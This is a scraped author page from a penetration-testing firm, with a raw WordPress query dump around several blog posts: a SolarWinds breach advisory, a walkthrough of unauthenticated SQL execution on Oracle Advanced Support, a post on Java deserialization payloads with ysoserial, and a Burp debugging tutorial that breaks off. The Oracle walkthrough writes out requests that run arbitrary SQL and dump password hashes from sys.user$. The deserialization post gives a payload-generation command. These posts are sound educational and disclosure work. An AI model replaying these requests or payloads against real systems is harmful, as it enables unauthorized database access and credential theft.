Eric Gruber

Eric Gruber serves as the Director of Attack Surface Management at NetSPI, where he is responsible for overseeing the platform's research and technical direction, expanding it's security capabilities, and managing the operations team that performs continuous testing within it. With over a decade of experience at NetSPI, Eric is a recognized expert in network, web application, thick application, and mobile penetration testing, and he actively contributes to the development of applications and scripts for the company's penetration testing team.

Eric's academic background includes a BS and a Master's degree in Computer Science from the University of Minnesota, with a focus on networking, security, and software engineering. His professional experience encompasses work in the education, information technology, and information security sectors, where he has been involved in designing and developing software, maintaining information systems, and researching security topics.
More by Eric Gruber
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "7"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "7"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "7"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "7"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "7"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "7"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "7"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "7"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
					SELECT   wp_posts.ID
					FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
					WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{6f701228b2a1f7ab09cb9509d6b1442688531dbef66ab205572ff42ee106b611}\"7\"{6f701228b2a1f7ab09cb9509d6b1442688531dbef66ab205572ff42ee106b611}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{6f701228b2a1f7ab09cb9509d6b1442688531dbef66ab205572ff42ee106b611}\"7\"{6f701228b2a1f7ab09cb9509d6b1442688531dbef66ab205572ff42ee106b611}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
					GROUP BY wp_posts.ID
					ORDER BY wp_posts.post_date DESC
					
				
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 27398
                    [post_author] => 53
                    [post_date] => 2022-02-21 12:52:03
                    [post_date_gmt] => 2022-02-21 18:52:03
                    [post_content] => 

Security leaders today are experiencing change at a rate like never before. Whether they’re going through an acquisition, deploying a remote workforce, or migrating workloads to the cloud, change is inevitable and unknown assets are sure to exist on your network.

Detecting and preventing the unknown is no easy task. But what you don’t know can hurt you. So, how can we identify vulnerable exposures before adversaries do?

It’s time for organizations to master the art of attack surface management. How? By implementing a human-first, continuous, risk-based approach.

In this webinar, participants will learn:

  • What is attack surface management?
  • How cyber attack surface management fits into broader enterprise-wide vulnerability management efforts
  • How to improve your attack surface visibility with continuous penetration testing
  • Why a human-first approach is the future of attack surface monitoring
  • An introduction to NetSPI’s Attack Surface Management (ASM) solution and our ASM Operations Team
[post_title] => Mastering the Art of Attack Surface Management [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-art-of-attack-surface-management [to_ping] => [pinged] => [post_modified] => 2023-09-20 11:12:35 [post_modified_gmt] => 2023-09-20 16:12:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=27398 [menu_order] => 47 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 20716 [post_author] => 91 [post_date] => 2020-12-15 09:41:57 [post_date_gmt] => 2020-12-15 09:41:57 [post_content] =>

As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week. We know now the breaches have been linked back to a supply chain attack on the SolarWinds Orion Platform, a software platform that manages IT operations and products for over 300,000 organizations, including over 425 of the Fortune 500, all ten of the top U.S. telecommunications companies, all five branches of the U.S. Military, all five of the top U.S. accounting firms, and many, many more.

While FireEye, the U.S. Treasury, and National Telecommunications and Information Administration (NTIA) were the first to report a security breach, the breadth of SolarWinds’ customer base is an indicator that the breaches are seemingly the tip of the iceberg.

For the sake of information sharing, here is an overview of the attacks, immediate steps you can take to identify whether you have fallen victim, and tips for protecting your organization as communicated by FireEye, SolarWinds, and NetSPI. For the full technical deep-dive, we highly recommend the FireEye blog post.

Overview: SolarWinds Orion Manual Supply Chain Attack

On December 13, SolarWinds issued a security advisory alerting to a manual supply chain attack on its Orion Platform software builds for versions 2019.4 HF 5 through 2020.2.1, released between March 2020 and June 2020.

FireEye discovered the attack and suggests it is a state-sponsored global intrusion campaign by a group named UNC2452 - though many industry experts are attributing the attack to APT29, a group of hackers associated with the Russian Foreign Intelligence Service.

  • Attack Origin: UNC2452 gained access to victims via trojan-based updates to SolarWinds’ Orion IT monitoring and management software, distributing malware called SUNBURST. Multiple trojanized updates were digitally signed and subsequently deployed via this URL: hxxps://downloads.solarwinds[.]com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574 /SolarWinds-Core-v2019.4.5220-Hotfix5.msp. The downloaded file is a standard Windows Installer Patch file, which includes the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component.
  • How It Works: The digitally signed SolarWinds.Orion.Core.BusinessLayer.dll file is a component of the Orion Improvement Program (OIP) software framework that contains a backdoor that communicates with third party servers via the HTTP protocol. The malicious DLL gets loaded into the legitimate SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe executables and can run dormant for up to two weeks before beaconing to a subdomain of avsvmcloud[.]com. To avoid possible detection, the C2 traffic between the beaconing server and the victim is made to resemble legitimate SolarWinds communications. This includes HTTP GET, HEAD, POST and PUT requests with JSON payloads in their bodies. The HTTP responses from the C2 server communicating with the victim contain XML data that resembles .NET assembly data used for normal SolarWinds operations. Within the XML, however, is obfuscated command information that is deobfuscated and then executed by the SolarWinds process on the victim’s system.
  • Impact/Result: Following the initial compromise and deployment of SUNBURST, a variety of more capable payloads can be deployed to facilitate lateral movement and data theft. Common payloads include TEARDROP and Cobalt Strike BEACON, both of which can be loaded into memory to improve stealth of operations.

Known breaches include:

FireEye: On December 8, FireEye communicated a state-sponsored security breach through which the attackers accessed FireEye’s Red Team assessment tools used to test customers’ security. Following the breach, the company made its list of countermeasures public. FireEye has now confirmed that this attack was a result of the SolarWinds Orion supply chain attack.

U.S. Treasury and the National Telecommunications and Information Administration (NTIA): On December 13, Reuters reported that Russian-associated hackers broke into the U.S. Treasury and Commerce department’s Microsoft 365 software and have been monitoring internal email traffic. Following a National Security Council meeting at the White House over the weekend, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive for all federal agencies to power down SolarWinds Orion.

Organizations are frantically working to figure out if they have been a victim of the attack and how to protect themselves. Here are the immediate steps to take, according to SolarWinds, FireEye, and NetSPI’s team of offensive security experts:

  1. First, determine if SolarWinds Orion is deployed within your environment. If unsure, NetSPI recommends performing a network scan to identify the Orion agent. For example, this can be performed with Nmap by running: nmap --open -sT -p 17778,17790 x.x.x.x/xx, where x.x.x.x is the network address and xx is the subnet mask. If the Orion agent is found, follow SolarWinds’ recommendations.
  2. SolarWinds recommends customers upgrade to Orion Platform version 2020.2.1 HF 1 as soon as possible. It also asks customers with any of the products listed on the security advisory for Orion Platform v2019.4 HF 5 to update to 2019.4 HF 6. Additional suggestions can be found in the security advisory. While upgrading Orion will prevent future backdoored deployments from occurring, it will not remediate the potentially infected deployments that have already taken place via the Orion Platform.
  3. Additionally, FireEye provides a list of recommendations including its signatures to detect this threat actor and supply chain attack. Specific details on the YARA, Snort, and ClamAV signatures can be found on FireEye’s public GitHub page.

Get in Touch: To connect with NetSPI for support with testing efforts related to the SolarWinds Orion attack, email info@NetSPI.com.

[post_title] => FireEye, SolarWinds, U.S. Treasury: What’s Happening in the Cyber Security World Right Now? [post_excerpt] => As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => fireeye-solarwinds-us-treasury-whats-happening-in-the-cyber-security-world-right-now [to_ping] => [pinged] => [post_modified] => 2021-05-04 17:03:39 [post_modified_gmt] => 2021-05-04 17:03:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20716 [menu_order] => 441 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 7734 [post_author] => 7 [post_date] => 2017-07-05 07:00:36 [post_date_gmt] => 2017-07-05 07:00:36 [post_content] => A little over a year ago I was performing a penetration test on a client's external environment. One crucial step in any external penetration test is mapping out accessible web servers. The combination of nmap with EyeWitness make this step rather quick as we can perform port scanning for web servers and then feed those results into EyeWitness to get screenshots. After combing through pages of screenshots that EyeWitness produced, I came across a screenshot for an Oracle Advanced Support server.

Img Eac C

Now, I have never heard of Oracle Advanced Support, but after some quick Googling it appeared to be a server that allows Oracle support to login externally and perform whatever support was needed on Oracle systems in an environment. With that in mind, let us put on our web app pentesting hat and walk through this together. Let's start with some simple recon on the application. This includes:
  • Searching for reported vulnerabilities
  • Spidering the application using Burp
  • Enumerating common directories
  • Looking at the source of available pages
Luckily for us, looking at the source of the main page included a link to the assets directory which included directory listings.

Img F Afa

Directory listings are great for an unknown application like this. It gives us some hope that we may be able to find something interesting that we shouldn’t have access too. Sure enough, searching through each of the directories we stumble upon the following JavaScript file:

Img C C

Let’s make that a little easier to read.
define(["jquery", "chart-util"], function(t, e) {
    var s = function() {
        var e = this;
        e.getSqlData = function(e, s) {
            var r = "rest/data/sql/" + e,
                a = t.getJSON(r);
            return s && a.success(s), a
        }, e.createNamedSql = function(e, s) {
            var r = t.post("rest/data/sql/", e);
            return s && r.success(s), r
        }, e.getNamedSqlList = function(e) {
            var s = t.getJSON("rest/data/sql_list");
            return e && s.success(e), s
        }, e.getSqlNameList = function(e) {
            var s = t.getJSON("rest/data/sql_name_list");
            return e && s.success(e), s
        }
    };
    return new s
});
One of my favorite and often overlooked things to do during a web application penetration testing is looking at the JavaScript files included in an application and seeing if there are any POST or GET requests that the application may or many not be using. So here we have a JavaScript file called sql-service.js. This immediately starts raising alarms in my head. From the file we have four anonymous functions performing three GET requests and one POST request via the t.getJSON and t.post methods. The functions are assigned to the following variables:
  • getSqlData
  • createNamedSql
  • getNamedSqlList
  • getSqlNameList
For the rest of the blog, I'll be referring to the anonymous functions as the variables they're assigned to. Each of the endpoints for each of the functions reside under /rest/data/ To break it down in terms of requests, we have the following:
  • GET /rest/data/sql
  • POST /rest/data/sql
  • GET /rest/data/sql_list
  • GET /rest/data/sql_name_list
With this information, let’s fire up my favorite proxy tool, Burp, and see what happens!

Down the Rabbit Hole

Let’s try the first GET request to /rest/data/sql from the getSqlData function. We can also see from the JavaScript that there needs to be a parameter appended on. Let's just add 'test' to the end. HTTP Request:
GET /rest/data/sql/test HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json
Content-Length: 0
HTTP Response:
HTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 20
Connection: close

Named SQL not found.
The response from the server gives us a 404 for the 'test' we appended to the end of the URL. The server also gives us a message: Named SQL not found. If we try other strings other than 'test' we get the same message. We could quickly bring up Burp Intruder and attempt to try enumerating potential parameter names with a dictionary list against this request to see if we can get any non 404 responses, but there's a much easier way of discovering what we should be using as parameter names. If we look at the JavaScript again, you'll notice that the names of the functions give us valuable information. We see two GET requests for the following functions: getNamedSqlList and getSqlNameList. The error message from our request above gave us a Named SQL not found error. Let's try the GET request in the function for getNamedSqlList. HTTP Request:
GET /rest/data/sql_list HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Connection: close
Content-Length: 243633

[{"id":1,"name":"sample","sql":"SELECT TIME,CPU_UTILIZATION,MEMORY_UTILIZATION FROM TIME_REPORT where TIME > :time","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":36,"name":"time","type":"date-time","value":null}]},{"id":2,"name":"cpu_only","sql":"SELECT TIME,CPU_UTILIZATION FROM TIME_REPORT","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[]},{"id":3,"name":"simple_param","sql":"SELECT TIME,CPU_USAGE FROM CPU_MONITOR WHERE CPU_USAGE < ?","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":1,"name":"cpu_usage","type":"int","value":null}]},{"id":4,"name":"double_param","sql":"SELECT TIME,CPU_USAGE FROM CPU_MONITOR WHERE CPU_USAGE between ? and ?","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":2,"name":"cpu_low","type":"int","value":null},{"id":3,"name":"cpu_high","type":"int","value":null}]},{"id":5,"name":"by_time","sql":"select time, cpu_usage from CPU_MONITOR where time(time) > ?","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":4,"name":"time","type":"string","value":null}]},{"id":10,"name":"tableTransferMethod","sql":"SELECT result_text, result_value FROM&nbsp;&nbsp; MIG_RPT_TABLE_TRANSFER_METHOD WHERE&nbsp; scenario_id = :scenario_id AND&nbsp; package_run_id = :pkg_run_id AND engagement_id = :engagement_id","dataSourceJNDI":"jdbc/acscloud","privileges":[],"paramList":[{"id":5,"name":"scenario_id","type":"int","value":null},{"id":6,"name":"pkg_run_id","type":"string","value":null},{"id":7,"name":"engagement_id","type":"int","value":null}]},{"id":16,"name":"dataTransferVolumes","sql":"select RESULT_TEXT,n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RESULT_VALUEnfrom&nbsp; MIG_RPT_DATA_TRANSFER_VOLUMEnwhere scenario_id = :scenario_idnAND&nbsp;&nbsp; package_run_id = :pkg_run_idnAND&nbsp;&nbsp; engagement_id = :engagement_id","dataSourceJNDI":"jdbc/acscloud","privileges":[],"paramList":[{"id":8,"name":"scenario_id","type":"int","value":null},{"id":9,"name":"pkg_run_id","type":"string","value":null},{"id":10,"name":"engagement_id","type":"int","value":null}]},{"id":17,"name":"dataCompressionPercentage","sql":"SELECT RESULT_TEXT,n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RESULT_VALUEnFROM&nbsp;&nbsp; MIG_RPT_DATA_COMPRESSION_PCTnWHERE&nbsp; scenario_id = :scenario_idnAND&nbsp;&nbsp;&nbsp; package_run_id = :pkg_run_idnAND engagement_id =

...
Well that certainly gave us quite a bit of information. Let's try to dissect this a bit. We have a JSON response that contains an array with a bunch of JSON objects. Let's look at the first object in that array.
{"id":1,"name":"sample","sql":"SELECT TIME,CPU_UTILIZATION,MEMORY_UTILIZATION FROM TIME_REPORT where TIME > :time","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":36,"name":"time","type":"date-time","value":null}]}
Here we have the following properties: name, sql, dataSourceJNDI, privileges, and paramList. The sql property being the most interesting as it contains a SQL query as the string value. Let's take the value for name and put it into the GET request we tried earlier. HTTP Request:
GET /rest/data/sql/sample HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 400 Bad Request
Content-Type: application/json
Content-Length: 44
Connection: close

Bad Request.Param value not defined for time
Hey! We got something back! But we're missing a parameter. Let's add that in. HTTP Request:
GET /rest/data/sql/sample?time=1 HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close

[]
Well, we didn't get anything back from the server, but we didn't get an error though! Perhaps the SQL query for sample is being executed, but nothing is coming back? We could keep trying other names from the request that we performed earlier, but let's look at the original JavaScript we have one last time. We can see that there is a function called createNamedSQL that performs a POST request. We know from the response to the getNamedSqlList request that named sql objects contain a sql property with a SQL query as the value. Maybe this POST request will allow us to execute SQL queries on the server? Let's find out.

SQL Execution

Here's the createNamedSQL POST request with an empty JSON object in the body: HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json
Content-Length: 0

{}
HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Content-Length: 71
Connection: close

A system error has occurred: Column 'SQL_NAME' cannot be null [X64Q53Q]
We get an error about the column SQL_NAME. This isn't very surprising as the body contains an empty JSON object. Let's just add in a random property name and value. HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 16
Content-Type: application/json;charset=UTF-8

{"test":1}
HTTP Response:
HTTP/1.1 400 Bad Request
Content-Type: text/plain
Content-Length: 365
Connection: close

Unrecognized field "test" (class com.oracle.acs.gateway.model.NamedSQL), not marked as ignorable (6 known properties: "privileges", "id", "paramList", "name", "sql", "dataSourceJNDI"])
&nbsp;at [Source: org.glassfish.jersey.message.internal.EntityInputStream@1c2f9d9d; line: 1, column: 14] (through reference chain: com.oracle.acs.gateway.model.NamedSQL["SQL_NAME"])
We get a bad request response about the field "test" being unrecognized, again, not surprising. But if you notice, the error message gives us properties we can use. Thanks Mr. Oracle server! These properties also happen to be the same ones that we were getting from the getNamedSqlList request. Let's try them out. For the dataSourceJNDI property I used one of the values from the response in the getNamedSqlList request. HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 101
Content-Type: application/json;charset=UTF-8

{
    "name": "test",
    "sql":"select @@version",
    "dataSourceJNDI":"jdbc/portal"
}
That's looks to be a pretty good test request. Let's see if it works. HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/plain
Content-Length: 200
Connection: close

A system error has occurred: MessageBodyWriter not found for media type=text/plain, type=class com.oracle.acs.gateway.model.NamedSQL, genericType=class com.oracle.acs.gateway.model.NamedSQL. [S2VF2VI]
Well we still got an error from the server. But, that's just for the content-type of the response. The named sql may have still been created. With the name field set to test, let's try the first GET request with that as the parameter. HTTP Request:
GET /rest/data/sql/test HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 24
Connection: close

[{"@@version":"5.5.37"}]
Well looky here! We got ourselves some SQL execution. Let's see who we are. HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 101
Content-Type: application/json;charset=UTF-8

{
    "name": "test2",
    "sql":"SELECT USER from dual;",
    "dataSourceJNDI":"jdbc/portal"
}
HTTP Request:
GET /rest/data/sql/test2 HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 19
Connection: close

[{"USER":"SYSMAN"}]
Looks like we're the SYSMAN user. Which per the Oracle docs (https://docs.oracle.com/cd/B16351_01/doc/server.102/b14196/users_secure001.htm) is used for administration. Let's see if we can grab some user hashes HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 120
Content-Type: application/json;charset=UTF-8

{
    "name": "test3",
    "sql":"SELECT name, password FROM sys.user$",
    "dataSourceJNDI":"jdbc/portal"
}
HTTP Request:
GET /rest/data/sql/test3 HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 5357
Connection: close

[{"NAME":"SYS","PASSWORD":"[REDACTED]"},{"NAME":"PUBLIC","PASSWORD":null},{"NAME":"CONNECT","PASSWORD":null},{"NAME":"RESOURCE","PASSWORD":null},{"NAME":"DBA","PASSWORD":null},{"NAME":"SYSTEM","PASSWORD":"[REDACTED]"},{"NAME":"SELECT_CATALOG_ROLE","PASSWORD":null},{"NAME":"EXECUTE_CATALOG_ROLE","PASSWORD":null}
...
And we're able to get the password hashes for users in the database. I redacted and removed the majority of them. With this information and the because we're a user with administration privileges, there are quite a few escalation paths. However, for the purposes of this blog, I'll stop here.

Conclusion

I contacted Oracle about the anonymous SQL execution here and they were quick in responding and fixing the issue. The real question to me is why are there web services that allow for SQL queries to be executed in the first place? The biggest take away from this blog is always look at the JavaScript files in an application. I have found functionality hidden within JavaScript files that has resulted in SQL injection, command injection, and XML external entity injection on several web application and external network penetration tests. As an exercise for any of the journeyman pentesters out there, walk through this blog and count how many vulnerabilities you can identify. Hint: there's more than three.

References

[post_title] => Anonymous SQL Execution in Oracle Advanced Support [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => anonymous-sql-execution-oracle-advanced-support [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:52:08 [post_modified_gmt] => 2021-06-08 21:52:08 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7734 [menu_order] => 625 [post_type] => post [post_mime_type] => [comment_count] => 3 [filter] => raw ) [3] => WP_Post Object ( [ID] => 6036 [post_author] => 7 [post_date] => 2016-03-02 07:00:09 [post_date_gmt] => 2016-03-02 07:00:09 [post_content] =>

Introduction

This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page here. The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with. For the majority of the applications we see, we can simply proxy the connection between the application and the server to view the serialized body of the HTTP request and HTTP response, assuming that HTTP is the protocol that is being used for communication. For this blog, HTTP is going to be assumed and to perform any type of proxying for HTTP, we will use Burp.

Burp Proxy

Here’s a simple example what a Burp proxied HTTP request with a serialized Java object in its body looks like:

Img D Ddaa

In this example we have a serialized object called State that is comprised of two Strings, capitol (spelled wrong in the example) and nicknames. From here, we can manipulate the request by sending it to the Repeater tab.

Generating Serialized Exploits

There are a few tools out there that will generate serialized Java objects that are able to exploit vulnerable software. I’m a big fan of Chris Frohoff’s ysoserial (https://github.com/frohoff/ysoserial.git). He has payload generators for nine exploitable software stacks at the time of me writing this. Simply running the jar file with the payload type and command to execute will generate the serialized object for you. Just make sure you output it to a file:
java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 'ping netspi.com' > payload
We can then copy the serialized output into Burp using the paste from file context menu item:

Img D Ddbdea C

Which will result in the following:

Img D Ddd C

Generating Serialized Exploits in Burp

Ysoserial works well enough, but I like to optimize my exploitation steps whenever possible. This includes removing the need to go back and forth between the command line and Burp. So I created the Burp extension Java Serial Killer to perform the serialization for me. It essentially is a modified Repeater tab that uses the payload generation from ysoserial. To use Java Serial Killer, right click on a POST request with a serialized Java object in the body and select the Send to Java Serial Killer item.

Img D Dddfa E

A new tab will appear in Burp with the request copied over into a new message editor window.

Java Deserialization Attacks With Burp

In the Java Serial Killer tab there are buttons for sending requests, serializing the body, selecting a payload type, and setting the command to run. For an example, say we want to ping netspi.com using the CommonsCollections1 payload type, because we know it is running Commons-Collections 3.1. We highlight the area we want the payload to replace, set the payload in the drop down menu, and then type the command we want and press the Serialize button. Pressing the little question mark button will also display the payload types and the software versions they are targeting if you need more information. After you highlight once, every subsequent button press of Serialize will update the payload in the request if you change the command, payload, or encoding.

Java Deserialization Attacks With Burp

We can also Base64 encode the payload by checking same named checkbox: Java Deserialization Attacks With Burp If we want to replace a specific parameter in a request with a payload we can do that too by highlighting it and pressing Serialize: Java Deserialization Attacks With Burp Java Deserialization Attacks With Burp Most likely we will need to Base64 encode the payload as a parameter in xml: Java Deserialization Attacks With Burp As Chris Frohoff adds more payloads, I plan to update Java Serial Killer accordingly.

Conclusion

I submitted the plugin to the Burp app store and I don't expect it to take too long to get approved, but if you want to try it out now, you can get it from our Github page (https://github.com/NetSPI/JavaSerialKiller). You will need to be running Java 8 for it to work. [post_title] => Java Deserialization Attacks with Burp [post_excerpt] => The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying... [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => java-deserialization-attacks-burp [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:09 [post_modified_gmt] => 2021-06-08 21:47:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6036 [menu_order] => 662 [post_type] => post [post_mime_type] => [comment_count] => 3 [filter] => raw ) [4] => WP_Post Object ( [ID] => 4131 [post_author] => 7 [post_date] => 2015-05-26 07:00:25 [post_date_gmt] => 2015-05-26 07:00:25 [post_content] => Burp is a very useful tool for just about any type of testing that involves HTTP. What makes it even better is the extension support that it offers. People can compliant the features that Burp has to offer with their own extensions to create a very powerful well-rounded application testing tool that is tailored to their needs. Sometimes, however, our extensions don't work the way we want and require additional testing. In this blog post, I'm going to walk through how we can setup debugging in Burp and our IDE when we create Burp extensions. Essentially, we are just going to be setting up Java remote debugging. This should hopefully be a useful tutorial for people who are creating buggy Burp extensions and want to figure out why they aren't working. This should also be especially helpful for first time Java developers who are not accustomed to Java's debugging capabilities. This will not be a tutorial on creating Burp extensions. For help on that, I'll refer you to the PortSwigger extender tutorials here.

Requirements

Java SDK (1.7 or 1.8) Java IDE (I prefer IntelliJ) Burp Suite (latest free or pro edition)

Getting Started

To begin debugging extensions in Burp we first need an extension to debug. For this example, I'll be using the Wsdler extension I created for parsing WSDL files. If you would like to follow along, the code for Wsdler is located here. We'll pull this down from git using git clone.
C:UsersegruberRepositories>git clone git@github.com:NetSPI/Wsdler.git Cloning into 'Wsdler'... remote: Counting objects: 458, done. remote: Total 458 (delta 0), reused 0 (delta 0), pack-reused 458 Receiving objects: 100% (458/458), 19.59 MiB | 221.00 KiB/s, done. Resolving deltas: 100% (204/204), done. Checking connectivity... done.
